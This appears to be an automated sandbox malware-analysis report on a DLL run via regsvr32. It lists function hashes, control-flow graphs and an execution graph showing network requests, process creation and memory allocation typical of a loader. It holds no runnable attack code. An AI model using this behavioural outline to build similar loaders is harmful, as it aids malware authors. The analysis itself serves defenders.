                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O}$X$bW
                                                      • API String ID: 0-980370356
                                                      • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                      • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                      • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                      • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006B24 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 562 180006b24-180006b65 563 180006b67-180006b6c 562->563 564 180006b72-180006b77 563->564 565 180006da8-180006e6a call 180029374 563->565 566 180006b79-180006b7e 564->566 567 180006b8b-180006c09 call 180008900 564->567 573 180006e76-180006e7a 565->573 574 180006e6c-180006e71 565->574 569 180006b84-180006b89 566->569 570 180006e7f-180006e84 566->570 575 180006c0e-180006c13 567->575 569->563 570->563 576 180006e8a-180006e8d 570->576 573->570 577 180006d9a-180006da3 574->577 578 180006c19-180006c1e 575->578 579 180006e8f-180006f04 call 180024104 575->579 576->579 580 180006f06-180006f0d 576->580 577->563 578->576 582 180006c24-180006c29 578->582 581 180006f11-180006f2b 579->581 580->581 582->577 585 180006c2f-180006cef call 180029374 582->585 585->576 588 180006cf5-180006d94 call 18002071c call 180024104 585->588 588->576 588->577
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "Gd$C2$HG
                                                      • API String ID: 0-142661339
                                                      • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                      • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006F2C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!$e##
                                                      • API String ID: 0-2900154246
                                                      • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                      • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                      • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                      • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002446C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: &J@$Va$Z*
                                                      • API String ID: 2038078732-1197100596
                                                      • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                      • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                      • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                      • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001BF0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 646 18001bf0c-18001bfb0 call 18001feb0 649 18001bfb2-18001c02b call 180026974 646->649 650 18001c031-18001c063 CreateFileW 646->650 649->650
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: `/
                                                      • API String ID: 823142352-1163903809
                                                      • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                      • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                      • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                      • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180016500 Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConnectInternet
                                                      • String ID:
                                                      • API String ID: 3050416762-0
                                                      • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                      • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                      • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                      • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180017BF8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID:
                                                      • API String ID: 2039140958-0
                                                      • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                      • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                      • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                      • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800149CC Relevance: 1.6, APIs: 1, Instructions: 91networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HttpOpenRequest
                                                      • String ID:
                                                      • API String ID: 1984915467-0
                                                      • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                      • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                      • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                      • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180011EF8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                      • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
                                                      • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                      • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:6.7%
                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1873
                                                      Total number of Limit Nodes:40
                                                      execution_graph 16679 7fef7545393 16680 7fef75453a0 16679->16680 16681 7fef75453b4 __SehTransFilter 16680->16681 16682 7fef75453cc 16680->16682 16688 7fef75454a0 RaiseException 16681->16688 16689 7fef75454a0 RaiseException 16682->16689 16684 7fef75453ca 16690 7fef753ed30 16684->16690 16687 7fef75453e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 16688->16684 16689->16684 16691 7fef753ed3e 16690->16691 16693 7fef753ed4c 16691->16693 16696 7fef753cf80 DecodePointer 16691->16696 16694 7fef753ed88 16693->16694 16695 7fef753cf80 _inconsistency 36 API calls 16693->16695 16694->16687 16695->16694 16697 7fef753cf9e 16696->16697 16700 7fef753cf50 16697->16700 16701 7fef753cf59 16700->16701 16704 7fef75439e0 16701->16704 16705 7fef75439fa 16704->16705 16714 7fef753d430 DecodePointer 16705->16714 16707 7fef7543a09 16710 7fef7543a20 16707->16710 16715 7fef753cff0 16707->16715 16709 7fef7543a42 16727 7fef7537090 16709->16727 16710->16709 16711 7fef753be50 terminate 14 API calls 16710->16711 16711->16709 16714->16707 16716 7fef753d02a 16715->16716 16717 7fef753d19a 16716->16717 16718 7fef753d1d8 DecodePointer 16716->16718 16721 7fef753bd70 _invalid_parameter 17 API calls 16717->16721 16719 7fef753d1e8 16718->16719 16720 7fef753d1ce 16719->16720 16722 7fef7537090 _exit 33 API calls 16719->16722 16723 7fef753d209 16719->16723 16720->16710 16721->16720 16722->16723 16725 7fef753d289 16723->16725 16730 7fef7533d00 RtlEncodePointer 16723->16730 16725->16720 16731 7fef7539360 LeaveCriticalSection 16725->16731 16728 7fef7537280 _exit 33 API calls 16727->16728 16729 7fef75370a9 16728->16729 16729->16693 16730->16725 16731->16720 17604 7fef7542695 17605 7fef75426a0 17604->17605 17606 7fef753bd70 _invalid_parameter 17 API calls 17605->17606 17607 7fef75426ab 17605->17607 17606->17607 17608 7fef7544a95 17610 7fef7544aad __SehTransFilter 17608->17610 17609 7fef7544c2b 17610->17609 17611 7fef7545180 __SehTransFilter 38 API calls 17610->17611 17611->17609 18099 7fef753c990 18103 7fef7534980 18099->18103 18101 7fef753c9b8 EncodePointer 18102 7fef753c9e5 18101->18102 18104 7fef75349cb _calloc_dbg_impl 18103->18104 18104->18101 18566 180024ee6 18567 180024f52 18566->18567 18568 180024eea 18566->18568 18569 18002506a CreateProcessW 18567->18569 16494 7fef7534399 16495 7fef75343a6 16494->16495 16497 7fef7534377 16494->16497 16497->16494 16497->16495 16498 7fef753abb0 DecodePointer 16497->16498 16499 7fef753abd3 16498->16499 16499->16497 16500 7fef7533599 16503 7fef7538900 16500->16503 16502 7fef753359e 16504 7fef7538920 16503->16504 16505 7fef7538936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16503->16505 16504->16502 16506 7fef75389de 16505->16506 16506->16504 16507 1800178f4 16510 18000ffc0 16507->16510 16509 180017924 16513 18001000e 16510->16513 16511 180011bd0 16522 1800053b0 16511->16522 16513->16511 16515 1800116b2 16513->16515 16516 18001667c 16513->16516 16515->16509 16519 1800166ac 16516->16519 16520 180016ad3 16519->16520 16526 180023624 16519->16526 16530 18000bc98 16519->16530 16534 1800270c0 16519->16534 16520->16513 16524 1800053e0 16522->16524 16523 18001a10c CreateProcessW 16525 18000598b 16523->16525 16524->16523 16524->16525 16525->16515 16529 180023662 16526->16529 16528 1800237ae 16528->16519 16529->16528 16538 18001a10c 16529->16538 16533 18000bcde 16530->16533 16531 18001a10c CreateProcessW 16532 18000c521 16531->16532 16532->16519 16533->16531 16533->16532 16537 180027157 16534->16537 16535 180027fe1 16535->16519 16536 18001a10c CreateProcessW 16536->16537 16537->16535 16537->16536 16539 18001a166 16538->16539 16540 180024f28 CreateProcessW 16539->16540 16541 18001a335 16540->16541 16541->16528 16542 130000 16543 130183 16542->16543 16544 13043e VirtualAlloc 16543->16544 16547 130462 16544->16547 16545 130531 GetNativeSystemInfo 16546 13056d VirtualAlloc 16545->16546 16548 130a00 16545->16548 16550 13058b 16546->16550 16547->16545 16547->16548 16549 1309d9 VirtualProtect 16549->16550 16550->16548 16550->16549 16550->16550 18581 7fef753c080 HeapValidate 18582 7fef753c0a2 18581->18582 18131 7fef754b580 18132 7fef754b5fa 18131->18132 18133 7fef754b6cb 18132->18133 18134 7fef754b676 18132->18134 18135 7fef754afb0 _fflush_nolock 17 API calls 18133->18135 18137 7fef754b6fe 18133->18137 18136 7fef753bd70 _invalid_parameter 17 API calls 18134->18136 18135->18137 18143 7fef754b6aa _LocaleUpdate::~_LocaleUpdate 18136->18143 18138 7fef754b8a2 18137->18138 18139 7fef754b84d 18137->18139 18142 7fef754b915 18138->18142 18149 7fef754b96a 18138->18149 18140 7fef753bd70 _invalid_parameter 17 API calls 18139->18140 18140->18143 18141 7fef7533280 __GSHandlerCheck 8 API calls 18144 7fef754cd90 18141->18144 18145 7fef753bd70 _invalid_parameter 17 API calls 18142->18145 18143->18141 18145->18143 18146 7fef754cc93 18146->18143 18147 7fef753bd70 _invalid_parameter 17 API calls 18146->18147 18147->18143 18148 7fef754bada 18150 7fef753bd70 _invalid_parameter 17 API calls 18148->18150 18149->18146 18149->18148 18150->18143 16736 7fef754df8d 16738 7fef754dfbb 16736->16738 16737 7fef754eadf 16763 7fef754ef10 16737->16763 16738->16737 16743 7fef754da75 16738->16743 16759 7fef754eec0 16738->16759 16741 7fef754eafd 16742 7fef754eb33 16741->16742 16745 7fef754eec0 25 API calls 16741->16745 16744 7fef754ec29 16742->16744 16758 7fef754eb49 _CrtMemDumpAllObjectsSince 16742->16758 16749 7fef754eca1 16743->16749 16754 7fef754dbb5 16743->16754 16746 7fef754ef10 25 API calls 16744->16746 16745->16742 16748 7fef754ebda 16746->16748 16747 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 16751 7fef7533280 __GSHandlerCheck 8 API calls 16747->16751 16748->16743 16752 7fef754eec0 25 API calls 16748->16752 16749->16747 16750 7fef753bd70 _invalid_parameter 17 API calls 16749->16750 16750->16747 16753 7fef754ed9e 16751->16753 16752->16743 16755 7fef753bd70 _invalid_parameter 17 API calls 16754->16755 16755->16747 16758->16748 16767 7fef754f000 16758->16767 16774 7fef754ee40 16758->16774 16760 7fef754eed7 16759->16760 16761 7fef754ee40 25 API calls 16760->16761 16762 7fef754ef07 16760->16762 16761->16760 16762->16737 16765 7fef754ef2c 16763->16765 16764 7fef754ef4d 16764->16741 16765->16764 16766 7fef754ee40 25 API calls 16765->16766 16766->16765 16768 7fef754f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16767->16768 16769 7fef754f026 _CrtMemDumpAllObjectsSince wcsxfrm 16767->16769 16768->16758 16769->16768 16770 7fef754f146 _CrtMemDumpAllObjectsSince 16769->16770 16771 7fef754f276 _CrtMemDumpAllObjectsSince 16769->16771 16770->16768 16773 7fef754f1b5 MultiByteToWideChar 16770->16773 16772 7fef754f29d MultiByteToWideChar 16771->16772 16772->16768 16773->16768 16775 7fef754ee62 16774->16775 16777 7fef754ee6e 16775->16777 16778 7fef754f360 16775->16778 16777->16758 16779 7fef754f399 16778->16779 16812 7fef754f622 16778->16812 16813 7fef754afb0 16779->16813 16780 7fef754f4f2 16785 7fef7533280 __GSHandlerCheck 8 API calls 16780->16785 16782 7fef7550170 23 API calls 16782->16780 16784 7fef754f3ed 16788 7fef754f4c7 16784->16788 16790 7fef754afb0 _fflush_nolock 17 API calls 16784->16790 16787 7fef754f7c5 16785->16787 16786 7fef754afb0 _fflush_nolock 17 API calls 16789 7fef754f3b8 16786->16789 16787->16777 16788->16780 16817 7fef7550170 16788->16817 16789->16784 16793 7fef754afb0 _fflush_nolock 17 API calls 16789->16793 16792 7fef754f43d 16790->16792 16794 7fef754f484 16792->16794 16796 7fef754afb0 _fflush_nolock 17 API calls 16792->16796 16795 7fef754f3ca 16793->16795 16794->16788 16799 7fef754f561 16794->16799 16797 7fef754afb0 _fflush_nolock 17 API calls 16795->16797 16798 7fef754f44f 16796->16798 16797->16784 16798->16794 16802 7fef754afb0 _fflush_nolock 17 API calls 16798->16802 16800 7fef754afb0 _fflush_nolock 17 API calls 16799->16800 16801 7fef754f56e 16800->16801 16803 7fef754f5b8 16801->16803 16805 7fef754afb0 _fflush_nolock 17 API calls 16801->16805 16804 7fef754f461 16802->16804 16803->16812 16825 7fef754b530 16803->16825 16806 7fef754afb0 _fflush_nolock 17 API calls 16804->16806 16807 7fef754f580 16805->16807 16806->16794 16807->16803 16809 7fef754afb0 _fflush_nolock 17 API calls 16807->16809 16810 7fef754f592 16809->16810 16811 7fef754afb0 _fflush_nolock 17 API calls 16810->16811 16811->16803 16812->16780 16812->16782 16815 7fef754afc1 16813->16815 16814 7fef754b04b 16814->16784 16814->16786 16815->16814 16816 7fef753bd70 _invalid_parameter 17 API calls 16815->16816 16816->16814 16818 7fef7550185 16817->16818 16819 7fef754afb0 _fflush_nolock 17 API calls 16818->16819 16820 7fef75501c7 16819->16820 16821 7fef75501dc 16820->16821 16823 7fef7550326 16820->16823 16828 7fef754ab10 16820->16828 16821->16780 16823->16821 16832 7fef7549290 16823->16832 16869 7fef754b090 16825->16869 16827 7fef754b56c 16827->16812 16829 7fef754ab23 16828->16829 16830 7fef754ab35 16828->16830 16829->16823 16830->16829 16831 7fef753bd70 _invalid_parameter 17 API calls 16830->16831 16831->16829 16833 7fef75492d8 16832->16833 16838 7fef75492b6 __doserrno 16832->16838 16834 7fef7549341 __doserrno 16833->16834 16840 7fef754938c 16833->16840 16837 7fef753bd70 _invalid_parameter 17 API calls 16834->16837 16835 7fef754945b 16846 7fef754fae0 16835->16846 16837->16838 16838->16821 16840->16835 16841 7fef7549410 __doserrno 16840->16841 16843 7fef753bd70 _invalid_parameter 17 API calls 16841->16843 16843->16838 16844 7fef75494a6 __doserrno 16860 7fef754fbc0 LeaveCriticalSection 16844->16860 16847 7fef754fb25 16846->16847 16848 7fef754fb7a 16846->16848 16851 7fef754fb56 16847->16851 16852 7fef754fb3b InitializeCriticalSectionAndSpinCount 16847->16852 16849 7fef7549464 16848->16849 16850 7fef754fb81 EnterCriticalSection 16848->16850 16849->16844 16854 7fef7549520 16849->16854 16850->16849 16861 7fef7539360 LeaveCriticalSection 16851->16861 16852->16851 16862 7fef754f900 16854->16862 16856 7fef7549545 16857 7fef754959d SetFilePointer 16856->16857 16859 7fef7549552 _dosmaperr 16856->16859 16858 7fef75495c1 GetLastError 16857->16858 16857->16859 16858->16859 16859->16844 16860->16838 16861->16848 16863 7fef754f913 __doserrno 16862->16863 16864 7fef754f935 16862->16864 16863->16856 16865 7fef754f99e __doserrno 16864->16865 16866 7fef754f9e9 __doserrno 16864->16866 16867 7fef753bd70 _invalid_parameter 17 API calls 16865->16867 16866->16863 16868 7fef753bd70 _invalid_parameter 17 API calls 16866->16868 16867->16863 16868->16863 16870 7fef754b0b7 16869->16870 16871 7fef754b168 16870->16871 16873 7fef754b1a6 _CrtMemDumpAllObjectsSince 16870->16873 16878 7fef754b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 16870->16878 16872 7fef753bd70 _invalid_parameter 17 API calls 16871->16872 16872->16878 16874 7fef754b347 _CrtMemDumpAllObjectsSince 16873->16874 16879 7fef754b1cf 16873->16879 16875 7fef754b359 WideCharToMultiByte 16874->16875 16876 7fef754b3ab 16875->16876 16877 7fef754b3c1 GetLastError 16876->16877 16876->16878 16877->16878 16881 7fef754b3d0 _calloc_dbg_impl 16877->16881 16878->16827 16879->16878 16880 7fef753bd70 _invalid_parameter 17 API calls 16879->16880 16880->16878 16881->16878 16882 7fef753bd70 _invalid_parameter 17 API calls 16881->16882 16882->16878 18583 7fef75310b0 18584 7fef75310da 18583->18584 18585 7fef75310fc 18584->18585 18586 7fef7531000 4 API calls 18584->18586 18587 7fef7533280 __GSHandlerCheck 8 API calls 18585->18587 18586->18585 18588 7fef753112c 18587->18588 16883 7fef7549fba 16893 7fef7549c4d 16883->16893 16884 7fef754a06d WriteFile 16885 7fef754a103 GetLastError 16884->16885 16884->16893 16889 7fef7549dd9 _dosmaperr __doserrno 16885->16889 16886 7fef7533280 __GSHandlerCheck 8 API calls 16888 7fef754a9f5 16886->16888 16887 7fef7549f66 WideCharToMultiByte 16887->16889 16890 7fef7549fbf WriteFile 16887->16890 16889->16886 16892 7fef754a050 GetLastError 16890->16892 16890->16893 16891 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 16891->16893 16892->16889 16892->16893 16893->16884 16893->16887 16893->16889 16893->16891 16894 7fef754a158 GetLastError 16893->16894 16895 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 16893->16895 16896 7fef754a1b5 GetLastError 16893->16896 16894->16889 16895->16893 16896->16889 16487 18001a10c 16488 18001a166 16487->16488 16491 180024f28 16488->16491 16490 18001a335 16492 180024fcb 16491->16492 16493 18002506a CreateProcessW 16492->16493 16493->16490 18589 7fef754bcbd 18590 7fef754b99c 18589->18590 18591 7fef754cc93 18590->18591 18594 7fef754bada 18590->18594 18592 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 18591->18592 18593 7fef753bd70 _invalid_parameter 17 API calls 18591->18593 18595 7fef7533280 __GSHandlerCheck 8 API calls 18592->18595 18593->18592 18597 7fef753bd70 _invalid_parameter 17 API calls 18594->18597 18596 7fef754cd90 18595->18596 18597->18592 18602 7fef7542c9f 18603 7fef7542caf 18602->18603 18604 7fef7542ca6 18602->18604 18604->18603 18605 7fef753bd70 _invalid_parameter 17 API calls 18604->18605 18605->18603 18606 7fef754809f 18607 7fef75480b0 _calloc_dbg_impl 18606->18607 18608 7fef7548145 _calloc_dbg_impl 18606->18608 18608->18607 18609 7fef753bd70 _invalid_parameter 17 API calls 18608->18609 18609->18607 16905 7fef754a7a0 16911 7fef754a61f 16905->16911 16906 7fef754a726 WideCharToMultiByte 16907 7fef754a791 GetLastError 16906->16907 16906->16911 16909 7fef754a887 _dosmaperr __doserrno 16907->16909 16908 7fef754a7b0 WriteFile 16908->16911 16912 7fef754a857 GetLastError 16908->16912 16910 7fef7533280 __GSHandlerCheck 8 API calls 16909->16910 16913 7fef754a9f5 16910->16913 16911->16906 16911->16908 16911->16909 16912->16911 16914 7fef7533faa 16915 7fef7533e30 LeaveCriticalSection 16914->16915 16916 7fef7533fb6 GetCurrentThreadId 16915->16916 16917 7fef7533fea SetLastError 16916->16917 18618 7fef7535cad 18619 7fef7535cb8 18618->18619 18622 7fef7535e1a _realloc_dbg 18619->18622 18623 7fef7539360 LeaveCriticalSection 18619->18623 18621 7fef7536201 18623->18621 16674 7fef753aca8 16675 7fef753acb2 16674->16675 16676 7fef75374e0 __crtExitProcess 3 API calls 16675->16676 16677 7fef753acbc RtlAllocateHeap 16676->16677 18633 7fef7535854 18634 7fef753585b _calloc_dbg_impl 18633->18634 18635 7fef753c020 _free_base 2 API calls 18634->18635 18636 7fef75359d5 18635->18636 16949 7fef753cb4f 16954 7fef753cb5c 16949->16954 16950 7fef7533280 __GSHandlerCheck 8 API calls 16951 7fef753cf0f 16950->16951 16952 7fef753cbeb GetStdHandle 16953 7fef753cc94 16952->16953 16956 7fef753cc07 std::exception::_Copy_str 16952->16956 16953->16950 16954->16952 16954->16953 16955 7fef753cc99 16954->16955 16955->16953 16978 7fef7541640 16955->16978 16956->16953 16958 7fef753cc73 WriteFile 16956->16958 16958->16953 16959 7fef753cd10 16960 7fef7537ff0 _invoke_watson_if_error 16 API calls 16959->16960 16961 7fef753cd3d GetModuleFileNameW 16960->16961 16962 7fef753cd68 16961->16962 16966 7fef753cdb1 16961->16966 16963 7fef7541640 17 API calls 16962->16963 16964 7fef753cd84 16963->16964 16967 7fef7537ff0 _invoke_watson_if_error 16 API calls 16964->16967 16965 7fef753ce5e 16998 7fef7542d80 16965->16998 16966->16965 16988 7fef7543380 16966->16988 16967->16966 16969 7fef753ce76 16971 7fef7537ff0 _invoke_watson_if_error 16 API calls 16969->16971 16973 7fef753cea3 16971->16973 16972 7fef753ce31 16974 7fef7537ff0 _invoke_watson_if_error 16 API calls 16972->16974 16975 7fef7542d80 17 API calls 16973->16975 16974->16965 16976 7fef753ceb9 16975->16976 16977 7fef7537ff0 _invoke_watson_if_error 16 API calls 16976->16977 16977->16953 16979 7fef7541661 16978->16979 16980 7fef75416c2 16979->16980 16983 7fef7541700 _calloc_dbg_impl 16979->16983 16982 7fef753bd70 _invalid_parameter 17 API calls 16980->16982 16981 7fef7541832 _calloc_dbg_impl 16984 7fef75416f6 _calloc_dbg_impl 16981->16984 16987 7fef753bd70 _invalid_parameter 17 API calls 16981->16987 16982->16984 16983->16981 16985 7fef75417f4 16983->16985 16984->16959 16986 7fef753bd70 _invalid_parameter 17 API calls 16985->16986 16986->16984 16987->16984 16990 7fef75433a6 16988->16990 16989 7fef754342f 16991 7fef753bd70 _invalid_parameter 17 API calls 16989->16991 16990->16989 16992 7fef754346d _calloc_dbg_impl 16990->16992 16994 7fef75433bc _calloc_dbg_impl 16990->16994 16991->16994 16993 7fef75435fb 16992->16993 16992->16994 16995 7fef7543639 _calloc_dbg_impl 16992->16995 16996 7fef753bd70 _invalid_parameter 17 API calls 16993->16996 16994->16972 16995->16994 16997 7fef753bd70 _invalid_parameter 17 API calls 16995->16997 16996->16994 16997->16994 16999 7fef7542da1 16998->16999 17000 7fef7542e02 16999->17000 17002 7fef7542e40 _calloc_dbg_impl 16999->17002 17001 7fef753bd70 _invalid_parameter 17 API calls 17000->17001 17005 7fef7542e36 _calloc_dbg_impl 17001->17005 17003 7fef7542f34 17002->17003 17004 7fef7542f72 _calloc_dbg_impl 17002->17004 17006 7fef753bd70 _invalid_parameter 17 API calls 17003->17006 17007 7fef75430b5 17004->17007 17009 7fef75430f3 _calloc_dbg_impl 17004->17009 17005->16969 17006->17005 17008 7fef753bd70 _invalid_parameter 17 API calls 17007->17008 17008->17005 17009->17005 17010 7fef753bd70 _invalid_parameter 17 API calls 17009->17010 17010->17005 18175 7fef7550550 18176 7fef7550575 18175->18176 18177 7fef755055e 18175->18177 18177->18176 18178 7fef7550568 CloseHandle 18177->18178 18178->18176 17645 7fef753425a FlsGetValue FlsSetValue 17646 7fef7534283 17645->17646 18179 7fef753e55a 18180 7fef753e564 18179->18180 18181 7fef753e601 18180->18181 18182 7fef753e5c2 RtlLookupFunctionEntry 18180->18182 18182->18181 18637 7fef753405b 18639 7fef753406e 18637->18639 18643 7fef7539360 LeaveCriticalSection 18639->18643 18641 7fef7534224 18642 7fef75341bb _updatetlocinfoEx_nolock 18644 7fef7539360 LeaveCriticalSection 18642->18644 18643->18642 18644->18641 18183 7fef754595c 18184 7fef753cf50 